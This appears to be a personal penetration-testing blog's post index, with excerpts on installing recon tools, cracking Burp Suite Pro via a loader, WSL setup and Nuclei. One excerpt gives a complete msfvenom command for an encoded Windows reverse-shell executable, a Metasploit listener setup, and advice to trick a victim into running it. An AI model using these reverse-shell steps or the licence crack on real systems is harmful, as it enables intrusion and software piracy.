Skip to main content

Posts

Installation of xssdynagen tool

Link to the repo:  https://github.com/Cybersecurity-Ethical-Hacker/xssdynagen?tab=readme-ov-file git clone https://github.com/Cybersecurity-Ethical-Hacker/xssdynagen.git cd xssdynagen The following 4 packages are needed for this tool to work and are already installed in kali.  pipx install aiohttp  pipx install colorama pipx install tqdm pipx install "uvloop>=0.17.0" You can always check the package existence: dpkg -l | grep packagename If not installed then use this command: pip/pip3 install -r requirements.txt If that also does not work then: apt install python3-aiohttp apt install python3-colorama apt install python3-tqdm apt install python3-uvloop In kali you need to install paramspider: apt install paramspider -y paramspider -d example.com   (Though this command in kali does not work) For ubuntu: git clone https://github.com/0xKayala/ParamSpider cd ParamSpider pip/pip3 install -r requirements.txt (If giving error then install the packages in above mentioned w...
Post a Comment
Read more
Recent posts

Installtion of SQLMutant tool

This tool is perfectly works on ubuntu 24 system. And I found it is not working properly in kali linux 24 version.   https://github.com/blackhatethicalhacking/SQLMutant/tree/main This tool need to use along with sqlmap tool. Showing this cheat sheet for kali or debian based system.  This tool actually analyze everything and give you the vulnerable url where sql injection is possible. You just need to use then sqlmap to exploit that.   Prerequisite: apt install pipx -y (for ubuntu) pip3 install uro or pipx install uro pipx ensurepath pipx completions  (not needed)  source ~/.bashrc   or restart system If go tool is not installed then run the below two commands first ( golang-go ) or follow this link to install go (https://mahimfiroj.blogspot.com/2024/12/installing-nuclei-in-kali.html) otherwise skip this step.   dpkg -l | grep packagename (Using this command you can check package is installed or not) apt install gccgo-go -y or apt install gol...
Post a Comment
Read more

Burpsuite install and crack in kali debian ubuntu

  Cracking burpsuite in kali: https://drive.google.com/drive/folders/13WQeT99kyyeWOmKGRKnjTKzCJmkrKdUa (This is not shared link. Log in to ovi.it88 gmail id and then click on the link) Follow step by step procedure...... Download the tool from the above link. Place the tool in /tmp folder or in any folder where you have permission in kali. The tool is under this folder  burpsuite_pro_v2024.5 for linux. Go to that /tmp/burpsuite_pro_v2024.5 for linux folder Open command prompt meaning terminal there and run this command: java -jar burploader.jar A pop-up window will appear. Another pop up window called license agreement will appear. Uncheck the condition and click I Accept . Now you have two windows.  From the loader window, copy the License key .  Paste that on the Enter license key window and click Next.  Check the "Use proxy server to connect" and click on Manual activation .  Now click Copy request under Manual Activation window.  Paste it ...
Post a Comment
Read more

WSL - windows subsystem for linux

  1. From the start menu, type "Turn Windows features on or off". Check the box, Virtual Machine Platform and Windows Subsystem for Linux or in the command prompt simply give this command: wsl.exe --install --no-distribution Now Restart the system.  If wsl is already installed, then give this command: wsl.exe --update 2. Now from Microsoft store download kali linux and install it. Or you can give this command to see list of distributions. Then install based on your choice.  To see list of distributions: wsl.exe --list --online To install: wsl.exe --install --distribution <Distro Name> i.e.  wsl --install --distribution kali-linux 3. Now it will ask for username and password, say at the time of installing kali-linux here. Provide that.  4. Once it is installed, it has come with very minimum package installation.  Run the following commands to install all packages: sudo apt update sudo apt full-upgrade -y sudo apt install -y kali-linux-default (This re...
Post a Comment
Read more

Metasploit in action

  Metasploit: Malicious executable creation: Command: msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp lhost=192.168.2.120 lport=4343 -b '\x00' -e x86/shikata_ga_nai -f exe -o shell.exe Now you need to transfer this exe to the victim. The victim needs to click on this to initiate the reverse shell. Before that in your attacking machine you need to listen for a connection so that the reverse shell from victim can connect to you easily.  Type msfconsole in your kali shell. Type following commands one by one beside msf6>   use multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.2.120        (This is you attack machine ip) set lport 4343 run Now trick or manipulate victim to click on that shell.exe You will get meterpreter shell like this.  Meterpreter session 1 opened (192.168.2.120:4343 -> 192.168.2.252:49266) at 2017-09-06 17:04:07 +0000 meterpreter>   Now if the user who clicked on the shell.exe...
Post a Comment
Read more

Installing nuclei and go tool in kali

 First you need to install go: https://go.dev/doc/install You need to download this go tool go1.23.4.linux-amd64.tar.gz by clicking the Download button.  Say you are root and download the tool in your Downloads directory. Now run the below command: tar -C /usr/local -xzf go1.23.4.linux-amd64.tar.gz (if this cmd fails then you need to move this tool to /usr/local folder then run this cmd tar -xzf  go1.23.4.linux-amd64.tar.gz) Now add /usr/local/go/bin to the PATH environment variable. You can do this by adding the following line to your $HOME/.profile or /etc/profile (for a system-wide installation): export PATH=$PATH:/usr/local/go/bin Now use the following command for immediate effect. Preventing you from log off then log back in: source $HOME/.profile go version (to check it is installed successfully) Install nuclei: go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest apt install nuclei nuclei -u https://www.domain.com Avi
Post a Comment
Read more

Finding public ip address prefix of any organizations

First do a nslookup to find out the public ip address of the org.  nslookup sslwireless.com  Now copy the public ip address and go to the following link.  https://whatismyipaddress.com  Paste your ip address here to find out the ASN number of yours. Copy that ASN number.  Now go to this link:  https://bgp.he.net  In the search box, paste the ASN number and click search. Then go to the Prefixes v4 tab to see the public ip block of that organization.  Avi  
Post a Comment
Read more